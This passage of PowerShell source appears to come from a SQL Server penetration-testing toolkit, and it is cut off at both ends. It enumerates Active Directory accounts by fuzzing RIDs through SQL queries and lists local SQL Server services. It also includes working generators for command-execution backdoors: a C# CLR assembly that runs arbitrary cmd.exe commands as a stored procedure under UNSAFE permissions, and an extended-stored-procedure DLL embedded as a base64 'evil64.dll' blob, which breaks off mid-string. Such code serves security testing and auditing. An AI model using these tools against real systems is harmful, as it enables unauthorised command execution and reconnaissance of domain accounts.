-Message \"$Instance : Enumerating Active Directory accounts for the `\"$Domain`\" domain...\"        \n\n        # Grab the domain SID\n        $DomainGroup = \"$Domain\\Domain Admins\"         \n        $DomainGroupSid = Get-SQLQuery -Instance $Instance -Query \"select SUSER_SID('$DomainGroup') as DomainGroupSid\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose            \n        $DomainGroupSidBytes = $DomainGroupSid | Select-Object -Property domaingroupsid -ExpandProperty domaingroupsid       \n        try{\n            $DomainGroupSidString = [System.BitConverter]::ToString($DomainGroupSidBytes).Replace('-','').Substring(0,48)\n        }catch{\n            Write-Warning \"The provided domain did not resolve correctly.\"\n            return\n        }\n\n        # Fuzz the domain object SIDs from StartId to EndId\n        $StartId..$EndId |\n        ForEach-Object -Process {\n            # Convert to Principal ID to hex\n            $PrincipalIDHex = '{0:x}' -f $_\n\n            # Get number of characters\n            $PrincipalIDHexPad1 = $PrincipalIDHex | Measure-Object -Character\n            $PrincipalIDHexPad2 = $PrincipalIDHexPad1.Characters\n\n            # Check if number is even and fix leading 0 if needed\n            If([bool]($PrincipalIDHexPad2%2))\n            {\n                $PrincipalIDHexFix = \"0$PrincipalIDHex\"\n            }\n\n            # Reverse the order of the hex\n            $GroupsOfTwo = $PrincipalIDHexFix -split '(..)' | Where-Object -FilterScript {\n                $_\n            }\n            $GroupsOfTwoR = $GroupsOfTwo | Sort-Object -Descending\n            $PrincipalIDHexFix2 = $GroupsOfTwoR -join ''\n\n            # Pad to 8 bytes\n            $PrincipalIDPad = $PrincipalIDHexFix2.PadRight(8,'0')\n\n            # Create users rid\n            $Rid = \"0x$DomainGroupSidString$PrincipalIDPad\"\n\n            # Define Query\n            $Query = \"SELECT    '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                '$Rid' as [RID],\n            SUSER_SNAME($Rid) as [DomainAccount]\"\n\n            # Execute Query\n            $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            $DomainAccount = $TblResults.DomainAccount\n            if($DomainAccount.length -ge 2)\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : - RID $Rid ($_) resolved to: $DomainAccount\"\n                }\n            }\n            else\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : - RID $Rid ($_) resolved to: \"\n                }\n            }\n\n            # Append results\n            $TblFuzzedAccounts = $TblFuzzedAccounts + $TblResults\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblFuzzedAccounts |\n        Select-Object -Property ComputerName, Instance, DomainAccount -Unique |\n        Where-Object -FilterScript {\n            $_.DomainAccount -notlike ''\n        }\n    }\n}\n\n\n# -------------------------------------------\n# Function: Get-ComputerNameFromInstance\n# ------------------------------------------\n# Author: Scott Sutherland\nFunction Get-ComputerNameFromInstance\n{\n    <#\n            .SYNOPSIS\n            Parses computer name from a provided instance.\n            .PARAMETER Instance\n            SQL Server instance to parse.\n            .EXAMPLE\n            PS C:\\> Get-ComputerNameFromInstance -Instance SQLServer1\\STANDARDDEV2014\n            SQLServer1\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance.')]\n        [string]$Instance\n    )\n\n    # Parse ComputerName from provided instance\n    If ($Instance)\n    {\n        $ComputerName = $Instance.split('\\')[0].split(',')[0]\n    }\n    else\n    {\n        $ComputerName = $env:COMPUTERNAME\n    }\n\n    Return $ComputerName\n}\n\n\nFunction  Get-SQLServiceLocal\n{\n    <#\n            .SYNOPSIS\n            Returns local SQL Server services using Get-WmiObject -Class win32_service. This can only be run against the local server.\n            .PARAMETER Instance\n            SQL Server instance to filter for.\n            .PARAMETER RunOnly\n            Filter for running services.\n            .EXAMPLE\n            PS C:\\> Get-SQLServiceLocal -Instance SQLServer1\\SQL2014 | Format-Table -AutoSize\n            .EXAMPLE\n            PS C:\\> Get-SQLServiceLocal | Format-Table -AutoSize\n\n            ComputerName   ServiceDisplayName                                     ServiceName                              ServicePath\n            ------------   ------------------                                     -----------                              -----------\n            SQLServer1     SQL Server Integration Services 12.0                   MsDtsServer120                           \"C:\\Program Files\\Microsoft SQL Server\\120\\DTS\\Binn\\MsDt...\n            SQLServer1     SQL Server Analysis Services (STANDARDDEV2014)         MSOLAP$STANDARDDEV2014                   \"C:\\Program Files\\Microsoft SQL Server\\MSAS12.STANDARDDE...\n            SQLServer1     SQL Server (SQLEXPRESS)                                MSSQL$SQLEXPRESS                         \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.SQLEXPRES...\n            SQLServer1     SQL Server (STANDARDDEV2014)                           MSSQL$STANDARDDEV2014                    \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.STANDARDD...\n            SQLServer1     SQL Full-text Filter Daemon Launcher (MSSQLSERVER)     MSSQLFDLauncher                          \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.MSSQLSERV...\n            SQLServer1     SQL Full-text Filter Daemon Launcher (SQLEXPRESS)      MSSQLFDLauncher$SQLEXPRESS               \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.SQLEXPRES...\n            SQLServer1     SQL Full-text Filter Daemon Launcher (STANDARDDEV2014) MSSQLFDLauncher$STANDARDDEV2014          \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.STANDARDD...\n            SQLServer1     SQL Server (MSSQLSERVER)                               MSSQLSERVER                              \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.MSSQLSERV...\n            SQLServer1     SQL Server Analysis Services (MSSQLSERVER)             MSSQLServerOLAPService                   \"C:\\Program Files\\Microsoft SQL Server\\MSAS12.MSSQLSERVE...\n            SQLServer1     SQL Server Reporting Services (MSSQLSERVER)            ReportServer                             \"C:\\Program Files\\Microsoft SQL Server\\MSRS12.MSSQLSERVE...\n            SQLServer1     SQL Server Reporting Services (SQLEXPRESS)             ReportServer$SQLEXPRESS                  \"C:\\Program Files\\Microsoft SQL Server\\MSRS12.SQLEXPRESS...\n            SQLServer1     SQL Server Reporting Services (STANDARDDEV2014)        ReportServer$STANDARDDEV2014             \"C:\\Program Files\\Microsoft SQL Server\\MSRS12.STANDARDDE...\n            SQLServer1     SQL Server Distributed Replay Client                   SQL Server Distributed Replay Client     \"C:\\Program Files (x86)\\Microsoft SQL Server\\120\\Tools\\D...\n            SQLServer1     SQL Server Distributed Replay Controller               SQL Server Distributed Replay Controller \"C:\\Program Files (x86)\\Microsoft SQL Server\\120\\Tools\\D...\n            SQLServer1     SQL Server Agent (SQLEXPRESS)                          SQLAgent$SQLEXPRESS                      \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.SQLEXPRES...\n            SQLServer1     SQL Server Agent (STANDARDDEV2014)                     SQLAgent$STANDARDDEV2014                 \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.STANDARDD...\n            SQLServer1     SQL Server Browser                                     SQLBrowser                               \"C:\\Program Files (x86)\\Microsoft SQL Server\\90\\Shared\\s...\n            SQLServer1     SQL Server Agent (MSSQLSERVER)                         SQLSERVERAGENT                           \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.MSSQLSERV...\n            SQLServer1     SQL Server VSS Writer                                  SQLWriter                                \"C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\sqlwrit...\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance.')]\n        [string]$Instance,\n       [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Filter for running services.')]\n        [switch]$RunOnly,\n                [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n    Begin\n    {\n        # Table for output\n        $TblLocalInstances = New-Object -TypeName System.Data.DataTable\n        $null = $TblLocalInstances.Columns.Add('ComputerName')\n        $null = $TblLocalInstances.Columns.Add('Instance')\n        $null = $TblLocalInstances.Columns.Add('ServiceDisplayName')\n        $null = $TblLocalInstances.Columns.Add('ServiceName')\n        $null = $TblLocalInstances.Columns.Add('ServicePath')\n        $null = $TblLocalInstances.Columns.Add('ServiceAccount')\n        $null = $TblLocalInstances.Columns.Add('ServiceState')\n        $null = $TblLocalInstances.Columns.Add('ServiceProcessId')\n    }\n\n    Process\n    {\n        # Grab SQL Server services based on file path\n        $SqlServices = Get-WmiObject -Class win32_service |\n        Where-Object -FilterScript {\n            $_.pathname -like '*Microsoft SQL Server*'\n        } |\n        Select-Object -Property DisplayName, PathName, Name, StartName, State, SystemName, ProcessId\n\n        # Add records to SQL Server instance table\n        $SqlServices |\n        ForEach-Object -Process {\n        \n            # Parse Instance\n            $ComputerName = [string]$_.SystemName\n            $DisplayName = [string]$_.DisplayName\n            $ServState = [string]$_.State\n\n            # Set instance to computername by default\n            $CurrentInstance = $ComputerName\n\n            # Check for named instance\n            $InstanceCheck = ($DisplayName[1..$DisplayName.Length] | Where-Object {$_ -like '('}).count\n            if($InstanceCheck) {\n\n                # Set name instance\n                $CurrentInstance = $ComputerName + '\\' +$DisplayName.split('(')[1].split(')')[0]\n\n                # Set default instance\n                if($CurrentInstance -like '*\\MSSQLSERVER')\n                {\n                    $CurrentInstance = $ComputerName\n                }\n            }\n          \n            # If an instance is set filter out service that dont apply\n            if($Instance -and $instance -notlike $CurrentInstance){\n                return\n            }\n\n            # Filter out services that arent runn if needed\n            if($RunOnly -and $ServState -notlike 'Running'){\n                return    \n                \n            }\n            \n            # Setup process id\n            if($_.ProcessId -eq 0){\n                $ServiceProcessId = \"\"\n            }else{\n                $ServiceProcessId = $_.ProcessId\n            }\n\n            # Add row\n            $null = $TblLocalInstances.Rows.Add(\n                [string]$_.SystemName,\n                [string]$CurrentInstance,\n                [string]$_.DisplayName,\n                [string]$_.Name,\n                [string]$_.PathName,\n                [string]$_.StartName,\n                [string]$_.State,\n                [string]$ServiceProcessId)            \n        }\n    }\n\n    End\n    {\n        # Status User\n        $LocalInstanceCount = $TblLocalInstances.rows.count\n\n        if(-not $SuppressVerbose){\n            Write-Verbose \"$LocalInstanceCount local SQL Server services were found that matched the criteria.\"        \n        }\n\n        # Return data\n        $TblLocalInstances \n    }\n}\n\n\n# -------------------------------------------\n# Function:  Create-SQLFilCLRDLL\n# -------------------------------------------\nfunction Create-SQLFileCLRDll\n{\n    <#\n            .SYNOPSIS\n            This script can be used to create a CLR DLL to execute OS commands through SQL Server.  It will\n            also generate a CREATE ASSEMBLY command that can be used to create an assembly and function without\n            requiring the DLL.\n            .NOTES\n            https://msdn.microsoft.com/en-us/library/microsoft.sqlserver.server.sqlpipe.sendresultsrow(v=vs.110).aspx\n            http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/\n            https://msdn.microsoft.com/en-us/library/ms254498(v=vs.110).aspx\n    #>\n\n    [CmdletBinding()]\n    Param(\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Operating system command to run.')]\n        [string]$Command,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Procedure name.')]\n        [string]$ProcedureName = \"cmd_exec\",  \n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Directory to output files.')]\n        [string]$OutDir = $env:temp,  \n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Output file name.')]\n        [string]$OutFile = \"CLRFile\"              \n    )\n\n    Begin\n    {\n\n        # ------------------------------------\n        # Setup File Paths\n        # ------------------------------------\n        $SRCPath = $OutDir + '\\' + $OutFile + '.csc'\n        $DllPath = $OutDir + '\\' + $OutFile + '.dll'\n        $CommandPath = $OutDir + '\\' + $OutFile + '.txt'\n    }\n\n    Process \n    {\n\n        # Create c# teamplate that will run any provided command\n        # Based on template from http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/\n        $TemplateCmdExec = @\"\n        using System;\n        using System.Data;\n        using System.Data.SqlClient;\n        using System.Data.SqlTypes;\n        using Microsoft.SqlServer.Server;\n        using System.IO;\n        using System.Diagnostics;\n        using System.Text;\n        public partial class StoredProcedures\n        {\n        [Microsoft.SqlServer.Server.SqlProcedure]\n        public static void $ProcedureName (SqlString execCommand)\n        {\n        Process proc = new Process();\n        proc.StartInfo.FileName = @\"C:\\Windows\\System32\\cmd.exe\";\n        proc.StartInfo.Arguments = string.Format(@\" /C {0}\", execCommand.Value);\n        proc.StartInfo.UseShellExecute = false;\n        proc.StartInfo.RedirectStandardOutput = true;\n        proc.Start();\n\n            // Create the record and specify the metadata for the columns.\n\t        SqlDataRecord record = new SqlDataRecord(new SqlMetaData(\"output\", SqlDbType.NVarChar, 4000));\n\n\t        // Mark the begining of the result-set.\n\t        SqlContext.Pipe.SendResultsStart(record);\n\n            // Set values for each column in the row\n\t        record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());\n\n\t        // Send the row back to the client.\n\t        SqlContext.Pipe.SendResultsRow(record);\n\n\t        // Mark the end of the result-set.\n\t        SqlContext.Pipe.SendResultsEnd();\n\n        proc.WaitForExit();\n        proc.Close();\n\n        }\n        };\n\"@\n\n        # Setup output file paths\n        Write-Verbose \"Writing source code to $SRCPath\" \n        $TemplateCmdExec | Out-File $SRCPath\n\n        # Identify csc path\n        Write-Verbose \"Locating csc.exe\" \n        $CSCPath = Get-ChildItem -Recurse \"C:\\Windows\\Microsoft.NET\\\" -Filter \"csc.exe\" | Sort-Object fullname -Descending | Select-Object fullname -First 1 -ExpandProperty fullname\n        if(-not $CSCPath){\n            Write-Output \"No csc.exe found.\"\n            return\n        }\n\n        # Compile binary\n\t$CurrentDirectory = pwd\n\tcd $OutDir\n        $Command = \"$CSCPath /target:library \" + $SRCPath        \n        Write-Verbose \"Compiling $SRCPath to $DllPath\" \n        write-verbose \"Command: $Command\"\n        $Results = Invoke-Expression $Command\n\tcd $CurrentDirectory\n\n        # Read and encode file\n        Write-Verbose \"Grabbing bytes from the dll\" \n        $stringBuilder = New-Object -Type System.Text.StringBuilder\n        $stringBuilder.Append(\"create assembly [\") > $null\n        $stringBuilder.Append($ProcedureName) > $null\n        $stringBuilder.Append(\"] AUTHORIZATION [dbo] from `n0x\") > $null\n        $assemblyFile = resolve-path $DllPath\n        $fileStream = [IO.File]::OpenRead($assemblyFile)\n         while (($byte = $fileStream.ReadByte()) -gt -1) {\n            $stringBuilder.Append($byte.ToString(\"X2\")) > $null\n        }\n        $stringBuilder.Append(\"`n with permission_set = UNSAFE\")\n        $stringBuilder.Append(\" GO\")\n        $stringBuilder.Append(\" CREATE PROCEDURE [dbo].[$ProcedureName] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [$ProcedureName].[StoredProcedures].[$ProcedureName];\")\n        $stringBuilder.Append(\" GO\")\n        $stringBuilder.Append(\" EXEC[dbo].[cmd_exec] 'whoami'\")        \n        $stringBuilder.Append(\" GO\")\n        $MySQLCommand = $stringBuilder.ToString() -join \"\"\n        $fileStream.Close()\n        $fileStream.Dispose()\n\n        # Generate SQL Command - note: this needs to be join together to work\n        Write-Verbose \"Writing CREATE ASSEMBLY command using DLL bytes to $CommandPath\"\n        $MySQLCommand | Out-File $CommandPath \n\n        # Status user\n        Write-Output \"Source: $SRCPath\"\n        Write-Output \"DLL: $DllPath\"\n        Write-Output \"SQL Command: $CommandPath\"\n    }\n    \n    End \n    {\n    }\n}\n\n\n# -------------------------------------------\n# Function:  Create-SQLFileXpDll\n# -------------------------------------------\nfunction Create-SQLFileXpDll\n{\n    <#\n            .SYNOPSIS\n            This script can be used to generate a DLL file with an exported function that can be registered as an\n            extended stored procedure in SQL Server.  The exported function can be configured to run any\n            Windows command.  This script is intended to be used to test basic SQL Server audit controls around\n            the sp_addextendedproc and sp_dropextendedproc stored procedures used to register and unregister\n            extended stored procedures.\n            .PARAMETER ExportName\n            Name of the exported function that will be created.\n            .PARAMETER Command\n            Operating system command that the exported function will run.\n            .PARAMETER OutFile\n            Name of the Dll file to write to.\n            .EXAMPLE\n            PS C:\\temp> Create-SQLFileXpDll -OutFile c:\\temp\\test.dll -Command \"echo test > c:\\temp\\test.txt\" -ExportName xp_test\n\n            Creating DLL c:\\temp\\test.dll\n            - Exported function name: xp_test\n            - Exported function command: \"echo test > c:\\temp\\test.txt\"\n            - DLL written\n            - Manual test: rundll32 c:\\temp\\test.dll,xp_test\n\n            SQL Server Notes\n            The exported function can be registered as a SQL Server extended stored procedure. Options below:\n            - Register xp via local disk: sp_addextendedproc 'xp_test', 'c:\\temp\\myxp.dll'\n            - Register xp via UNC path: sp_addextendedproc 'xp_test', '\\\\servername\\pathtofile\\myxp.dll'\n            - Unregister xp: sp_dropextendedproc 'xp_test'\n            .LINK\n            http://en.cppreference.com/w/cpp/utility/program/system\n            http://www.netspi.com\n\n            .NOTES\n            The extended stored procedure template used to create the DLL shell was based on the following stackoverflow post:\n            http://stackoverflow.com/questions/12749210/how-to-create-a-simple-dll-for-a-custom-sql-server-extended-stored-procedure\n\n            Modified source code used to create the DLL can be found at the link below:\n            https://github.com/nullbind/Powershellery/blob/master/Stable-ish/MSSQL/xp_evil_template.cpp\n\n            The method used to patch the DLL was based on Will Schroeder \"Invoke-PatchDll\" function found in the PowerUp toolkit:\n            https://github.com/HarmJ0y/PowerUp\n    #>\n\n    [CmdletBinding()]\n    Param(\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Operating system command to run.')]\n        [string]$Command,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Name of exported function.')]\n        [string]$ExportName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Dll file to write to.')]\n        [string]$OutFile\n    )\n\n    # -----------------------------------------------\n    # Define the DLL file and command to be executed\n    # -----------------------------------------------\n\n    # This is the base64 encoded evil64.dll -command: base64 -w 0 evil64.dll > evil64.dll.b64\n    $DllBytes64 = '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zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxAVVdIgezIAAAASIvsSIv8uTIAAAC4zMzMzPOruAEAAABIjaXIAAAAX13DzMzMzMzMzMzMzMzMzMzMzMzMzMzMSIlMJAhVV0iB7MgAAABIi+xIi/y5MgAAALjMzMzM86tIi4wk6AAAAEiNpcgAAABfXcPMzMzMzMzMzMzMzMzMzEiJVCQQSIlMJAhVV0iB7MgAAABIi+xIi/y5MgAAALjMzMzM86tIi4wk6AAAAEiNpcgAAABfXcPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMTIlEJBiJVCQQSIlM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